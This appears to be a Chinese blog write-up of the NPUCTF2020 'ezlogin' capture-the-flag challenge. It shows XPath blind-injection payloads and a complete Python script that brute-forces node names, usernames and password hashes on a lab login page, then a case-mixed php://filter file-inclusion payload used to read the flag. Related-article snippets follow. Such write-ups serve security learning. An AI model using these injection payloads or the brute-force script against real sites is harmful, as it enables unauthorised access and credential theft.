[NPUCTF2020]ezlogin

最新推荐文章于 2023-07-15 20:24:04 发布
最新推荐文章于 2023-07-15 20:24:04 发布
阅读量1.5k 收藏
点赞数
分类专栏: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SopRomeo/article/details/106556717
版权

在这里插入图片描述
bp瞅瞅
在这里插入图片描述
发现他提交的与常见的不同
搜索一波,发现是XPATH注入
XPATH注入讲解
把文章给出的payload放上去

'or count(/)=1  or ''='

在这里插入图片描述

改成2
在这里插入图片描述
有明显的的布尔回显(注意在重新提交的时候记得刷新下页面)
说明他根下只有一个节点
接下来是盲注了,注意他那里有个token,过期时间比较快,记得用会话保持状态带上。
测试长度
payload

'or string-length(name(/*[1]))=4 or ''='

长度为4
猜测根节点下的名称

'or substring(name(/*[1]), 1, 1)='a'  or ''='

名称为root
猜测子节点的名称

'or substring(name(/root/*[1]), 1, 1)='a'  or ''='

名称为accounts

在这里插入图片描述
account下还有两个节点

'or substring(name(/root/accounts/*[1]), 1, 1)='a'  or ''='

两个节点都为:user,
再跑user下的节点
发现第一个节点为`id

在这里插入图片描述
再跑跑后面的节点看看
username ,password

接着跑用户名和密码了

'or substring(/root/accounts/user/username[1]/text(), 1, 1)='a'  or ''='

用户名
guest,adm1n

还有MD5加密后的密码

放上完整的exp

import requests
import re

s = requests.session()
url ='http://4ab0514f-3518-44ad-9b5f-f8c60fb0ea92.node3.buuoj.cn/login.php'



head ={
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",
    "Content-Type": "application/xml"
}
find =re.compile('<input type="hidden" id="token" value="(.*?)" />')

strs ='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'


flag =''
for i in range(1,100):
    for j in strs:

        r = s.post(url=url)
        token = find.findall(r.text)
        #猜测根节点名称
        payload_1 = "<username>'or substring(name(/*[1]), {}, 1)='{}'  or ''='</username><password>3123</password><token>{}</token>".format(i,j,token[0])
        #猜测子节点名称
        payload_2 = "<username>'or substring(name(/root/*[1]), {}, 1)='{}'  or ''='</username><password>3123</password><token>{}</token>".format(i,j,token[0])

        #猜测accounts的节点
        payload_3 ="<username>'or substring(name(/root/accounts/*[1]), {}, 1)='{}'  or ''='</username><password>3123</password><token>{}</token>".format(i,j,token[0])

        #猜测user节点
        payload_4 ="<username>'or substring(name(/root/accounts/user/*[2]), {}, 1)='{}'  or ''='</username><password>3123</password><token>{}</token>".format(i,j,token[0])

        #跑用户名和密码
        payload_username ="<username>'or substring(/root/accounts/user[2]/username/text(), {}, 1)='{}'  or ''='</username><password>3123</password><token>{}</token>".format(i,j,token[0])

        payload_password ="<username>'or substring(/root/accounts/user[2]/password/text(), {}, 1)='{}'  or ''='</username><password>3123</password><token>{}</token>".format(i,j,token[0])


        print(payload_username)
        r = s.post(url=url,headers=head,data=payload_username)
        print(r.text)


        if "非法操作" in r.text:
            flag+=j
            print(flag)
            break

    if "用户名或密码错误!" in r.text:
        break

print(flag)

拿admin去登录

在这里插入图片描述
注意他的url,试试文件包含
在这里插入图片描述
有过滤
查看源代码还有个提示
在这里插入图片描述
在这里插入图片描述
然后就是绕过他的过滤了
不会饶,看了wp
其实他还过滤了read
接着就是大小绕过
phP://filter/convert.bAse64-encode/resource=/flag

在这里插入图片描述
读取到flag

penson by 小乌
关注
专栏目录
EZ-Login:Flask最简单的登录系统
03-08
EZ登录 要求 您只需要安装Python和Flask。 要获得Flask,您可以通过pip install Flask或进行pip3 install Flask 。 设置 设置登录系统非常简单。 您实际上无法进行git clone因为您只需要克隆一个文件夹即可。 复制并粘贴并将其放入名为Login.py的文件中。 接下来创建一个名为Users.json全新JSON文件。 确保它与Login.py在同一目录中,并确保其中没有数据。 空白表示: {} 。
[NPUCTF2020]ReadlezPHP1
最新发布
kw741951的博客
08-07 209
此处未想到flag在phpinfo文件中,在网上才发现flag在phpinfo文件,因此构造序列化信息:O:8:"HelloPhp":2:{s:1:"a";ctrl+u查看源代码。看到php代码,打开。
[NPUCTF2020]ezlogin (xpath盲注)
记录学习,一起进步
03-26 884
[NPUCTF2020]ezlogin (xpath盲注)
[NPUCTF2020]Baby Obfuscation.exe.i64
06-02
Baby Obfuscation分析过程
解读“模块的沟通”
08-04
在数字电路设计中,尤其是使用硬件描述语言如Verilog进行设计时,模块间的通信是非常关键的一个环节。这里的“模块的沟通”是指不同模块之间通过信号交互来传递信息和协调操作的过程。本文将深入探讨这一概念,并以...
flash涂鸦板
12-10
简单易操作 一木了然 而且能让你快速体验到FLASH的操作乐趣 让你有想去学的冲动 而且能让你快速掌握简单操作
obfuscation
05-11
obfuscation 基于Allatori的Java代码混淆工具 使用Allatori混淆工具写的一个Maven插件 mvn install此项目,然后在想要混淆的项目的pom文件中引入此插件,并指定配置文件全路径以及要混淆的类所在路径即可使用 ...
[NPUCTF2020]ezlogin-XPATH注入学习
cjdgg的博客
05-13 655
[NPUCTF2020]ezlogin-XPATH注入学习 这题进入后就是一个简单的登录页面,拿御剑没有扫出别的东西,简单的sql注入试了一下也没有任何回显,爆破的话他这里有一个token一直在刷新,所以会有点麻烦,应该也不会拿爆破来考别人 后来看了别人的WP才知道是XPATH注入,以前没遇到过,也不是很了解,于是去找了篇相关文章顺带学习一下 这些是XPATH的一些基础语法和介绍 从这里可以看到它和sql注入还是很相像的,只不过XPATH注入好像没有注释符把后面的都注释掉,所以需要我们去构造闭合后面的
BUUCTF-EasyLogin
shawdow_bug的博客
07-15 1011
这是一道 Node.js 语言的题目,在此记录我在做这道题的思考过程。
[NPUCTF2020]ezlogin xPATH注入
qq_54929891的博客
07-01 450
xPATH
Web-11(41-44)-BUUCTF平台
~airrudder~
07-09 893
本篇内容 [NPUCTF2020]ReadlezPHP [NPUCTF2020]ezlogin [NPUCTF2020]ezinclude [NPUCTF2020]验证???? [NPUCTF2020]web???? [NPUCTF2020]EzShiro 上一篇 | 目录 | 下一篇 [NPUCTF2020]ReadlezPHP 直接加view-source:查看源代码: <?php #err...
CVE-2019-14439以及[NPUCTF2020]EzShiro复现
fmyyy1的博客
12-22 5080
CVE-2019-14439 是由logback 引起的 jndi 注入,找不到详细分析的文章,对着网上的poc简单看了一下。 在ch.qos.logback.core.db.JNDIConnectionSource这个类里 漏洞原理并不复杂,很清晰明了的jndi注入。 poc package Jackson; import com.fasterxml.jackson.databind.ObjectMapper; import java.io.IOException; public class
crypto-babyLCG(NPUCTF2020)
耐酸碱高温固化材料近距离传输研究
11-30 1399
显然如果要解密出flag明文那必须要反推出最初的seed参数,将后面产生的随机数全部复原。的原因是为了保持向量各个数值bit位保持一致(关于格密码基础概念推荐这篇。因为前20个随机数的高位是已知的,接下来思路是针对这个式子做变形。其中A,B均可通过a,b,h推出。现在将以上关系式写成矩阵形式。由于h均为已知,那么现在找到低位l递推的关系式,又因为。近期研究格密码过程中遇到的一个很好的题目,记录一下。则可以推出所有低位l与l1的关系式,简写为。构造lattice,最后一项取2。将s拆分为高位h和低位l变为。
BUUCTF--[NPUCTF2020]ezlogin
qq_46263951的博客
07-28 573
进入页面后是一个登录页面 几番尝试后没啥发现,尝试抓包 判断是一个Xpath数据,这里需要使用xpath注入 先学习一下Xpath注入 这里使用大佬的脚本进行探测 import requests import re import time session = requests.session() url = "http://391bfefa-8949-4535-8129-07c86723c6b9.node4.buuoj.cn" chars = "ABCDEFGHIJKLMNOPQRST..
从以下代码中找到被藏起来的e,提示:在代码注释中。from Crypto.Util.number import * from gmpy2 import * from secret import flag p = getPrime(25) e = # Hidden q = getPrime(25) n = p * q m = bytes_to_long(flag.strip(b"npuctf{").strip(b"}")) c = pow(m, e, n) print(c) print(pow(2, e, n)) print(pow(4, e, n)) print(pow(8, e, n)) ''' 169169912654178 128509160179202 518818742414340 358553002064450
07-16
根据提示,在代码注释中可以找到隐藏的 `e` 值。以下是给定代码的修改版本,以显示隐藏的 `e` 值: ```python from Crypto.Util.number import * from gmpy2 import * from secret import flag p = getPrime(25) # Hidden e = 65537 q = getPrime(25) n = p * q m = bytes_to_long(flag.strip(b"npuctf{").strip(b"}")) c = pow(m, e, n) print(c) print(pow(2, e, n)) print(pow(4, e, n)) print(pow(8, e, n)) ``` 在修改后的代码中,我们将 `e` 的值设置为 65537。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值